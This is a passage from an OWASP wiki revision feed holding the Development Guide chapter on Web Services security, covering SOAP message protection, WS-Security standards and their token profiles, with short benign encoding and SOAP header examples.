* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59471</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59471"/>
				<updated>2009-04-26T11:59:55Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Freshness */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web Services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader toward the appropriate usage patterns, and to warn about potential roadblocks along the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some herald Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, holding that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw: let’s assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications used its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format – one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers – in log files (where it can be browsed by anybody) and local caches – aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make conscious trade-offs at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
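The encode-then-restore round trip can be sketched with Python’s standard library; the token bytes below are purely illustrative, standing in for DER-encoded certificate or Kerberos token data:

```python
import base64

# Hypothetical binary security token (e.g. DER-encoded X.509 bytes);
# the content here is illustrative, not a real certificate.
binary_token = bytes(range(256))

# Convert to text so the token can travel inside an XML (SOAP) element...
encoded = base64.b64encode(binary_token).decode("ascii")

# ...and unambiguously restore the original bytes on the receiving side.
decoded = base64.b64decode(encoded)
assert decoded == binary_token
```

The same idea applies in any language; only the text form crosses the wire, and both sides agree on Base64 as the codec.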
&lt;br /&gt;
Second, passing credentials carries an inherent risk of disclosure – either by sniffing them during wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or never sent “in the clear”. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
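As a sketch of the hashing approach, the WS-Security UsernameToken profile defines a password digest of roughly the shape Base64(SHA-1(nonce + created + password)), so the password itself never crosses the wire. The helper name and input values below are illustrative:

```python
import base64
import hashlib
import os
from datetime import datetime, timezone

def password_digest(password: str, nonce: bytes, created: str) -> str:
    """UsernameToken-style digest: Base64(SHA-1(nonce + created + password)).
    The receiver, knowing the password, recomputes and compares the digest;
    the cleartext password is never transmitted."""
    raw = nonce + created.encode("utf-8") + password.encode("utf-8")
    return base64.b64encode(hashlib.sha1(raw).digest()).decode("ascii")

# A fresh nonce and creation timestamp accompany each request.
nonce = os.urandom(16)
created = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
digest = password_digest("s3cret", nonce, created)
```

Because the nonce changes on every message, a captured digest cannot simply be replayed with a different payload.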
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
The usual means of protecting against replayed messages are either using unique identifiers (nonces) on messages and keeping track of the processed ones, or using a relatively short validity time window. In the Web Services world, information about a message’s creation time is usually communicated by inserting timestamps, which may simply state the instant the message was created, or carry additional information, such as its expiration time or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew”, whereby the server’s or clients’ clocks drift too far apart, preventing timely message delivery – although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received, a web service must always ask two questions: “do I trust the caller?” and “did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). Such alteration may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms, such as checksums, applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties), to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
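A minimal sketch of the HMAC option: unlike a bare digest, the tag depends on a pre-shared secret key, so an attacker who alters the message cannot recompute a valid tag. The key and message bytes are illustrative:

```python
import hashlib
import hmac

# Assumed pre-shared key, known only to the two communicating parties.
SECRET = b"shared-key-known-only-to-the-two-parties"

def sign(message):
    # HMAC ties the digest to the key holder; a plain digest could be
    # recomputed by anyone who tampered with the message.
    return hmac.new(SECRET, message, hashlib.sha256).hexdigest()

def verify(message, tag):
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(sign(message), tag)

msg = b"withdraw:account=1234;amount=100"
tag = sign(msg)
```

Any modification of the message body invalidates the tag, so verification fails with a cryptographic error rather than silently accepting altered content.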
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
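The three checks above form a simple decision chain; in the sketch below the user store, token values, and operation names are hypothetical stand-ins for whatever a real Policy Server would consult:

```python
# Identification: is the caller known at all?
# Authentication: do we trust the caller's identity claim (token)?
# Authorization: may this caller perform this operation?
USERS = {"alice": "token-abc"}           # hypothetical identity store
POLICY = {"alice": {"getQuote"}}         # hypothetical entitlements

def authorize(user, token, operation):
    if user not in USERS:                # identification failed
        return False
    if USERS[user] != token:             # authentication failed
        return False
    return operation in POLICY.get(user, set())  # authorization
```

In practice the authorization step is usually delegated to external policy infrastructure; the point here is only the ordering of the three decisions.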
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help stop attacks on Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages on to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task typically required of audits is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
The Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Its work mostly consists of taking other broadly accepted standards and developing so-called profiles – sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS WS-Security standard and specifies sets of optional and required security features for Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
The Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is general rather than strictly Web Service-specific, it is important for this topic because of its close relation to the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of the software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, which join them to work on a particular issue or proposal. The results of these joint activities, once they reach a certain maturity, are often submitted to standards committees as the basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only the HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and for Document-style communication, with message contents based exclusively on the XML Schema definitions in the Web Service’s WSDL. Invocation results may optionally be returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
The SOAP protocol, while defining the communication framework, provides no help in securing message exchanges – the communication must either happen over secure channels or use the protection mechanisms described later in this chapter. &lt;br /&gt;
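As a minimal sketch of the structure just described, the following standard-library Python builds a bare SOAP 1.1 envelope with a Header and a Body; the GetQuote operation and its urn:example namespace are invented for illustration and do not come from any real service’s WSDL.&lt;br /&gt;

```python
# Build a minimal SOAP 1.1 envelope (Header + Body) with the standard library.
# The operation element and its namespace are illustrative only.
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ET.register_namespace("soap", SOAP_NS)

envelope = ET.Element("{%s}Envelope" % SOAP_NS)
ET.SubElement(envelope, "{%s}Header" % SOAP_NS)          # security headers go here
body = ET.SubElement(envelope, "{%s}Body" % SOAP_NS)
operation = ET.SubElement(body, "{urn:example}GetQuote")  # hypothetical operation
operation.text = "OWASP"

soap_message = ET.tostring(envelope, encoding="unicode")
print(soap_message)
```

In a real deployment such a message would be POSTed over HTTP to the endpoint advertised in the service’s WSDL.&lt;br /&gt;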
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/&amp;lt;/u&amp;gt;) and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications provide integrity, message and signer authentication, as well as support for encryption and decryption of whole XML documents or of selected elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of these standards comes from the highly flexible framework they define for referencing the data being processed (both internal and external to the XML document), for referring to secret keys and key pairs, and for representing the results of signing and encrypting operations as XML, which is added to or substituted into the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications currently being developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium headed by Microsoft and IBM, with input from Verisign, RSA Security, and other participants, developed a family of specifications collectively known as the “Web Services Roadmap”. Its foundation, WS-Security, was submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still in various stages of development, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al.), trust and security token exchange (WS-Trust), and establishing context for secure conversation (WS-SecureConversation). One specification in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it was supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently lacks industry momentum.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of the “Roadmap”, which was later renamed the Web Services Architecture (WSA). WSS serves as the foundation for all other specifications in this domain, creating a basic infrastructure for message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Version 1.0 was approved in 2004; version 1.1 of the specification followed as an OASIS standard in February 2006.&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them, may vary substantially. At a high level the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of these types is further specified in one or more profile documents, which define the additional attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, where each message is an isolated piece of information, carrying enough security data to verify all important message properties – authenticity, integrity, freshness – and to initiate decryption of any encrypted message parts. This stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data to higher-level protocols. Those protocols, based on standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard-to-detect problems, as discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents: a core document, which defines how security headers are included in the SOAP envelope and describes the high-level blocks that must be present in a valid security header, and profile documents, which have the dual task of extending the definitions for the token types they deal with – providing additional attributes and elements – and of defining relationships left out of the core specification, such as the use of attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this chapter), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in security headers – see the XML security specifications section above for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken defined by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WS-Security with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows which decoder to apply in order to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
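The encoding step can be reproduced with a few lines of standard-library Python; the eight-byte token below is a stand-in for real binary data such as a DER-encoded certificate.&lt;br /&gt;

```python
# Round-trip binary data through Base64, the default text encoding WSS
# uses to carry binary tokens inside XML elements.
import base64

binary_token = bytes(range(8))  # stand-in for e.g. a DER-encoded certificate
encoded = base64.b64encode(binary_token).decode("ascii")
decoded = base64.b64decode(encoded)

print(encoded)  # AAECAwQFBgc= - plain ASCII, safe to embed in an XML element
assert decoded == binary_token  # decoding recovers the original bytes exactly
```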
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header acts like the envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well: the letter (SOAP message) should neither know nor care about its envelope (WSS Header), since the different units of information carried on the envelope and in the letter are presumably targeted at different recipients or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (in SOAP 1.1) or roles (in SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions and signature verifications, and should generally be avoided. The WSS security header has a loose structure, as the specification does not require any elements to be present – so a minimal header in an otherwise empty message looks like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
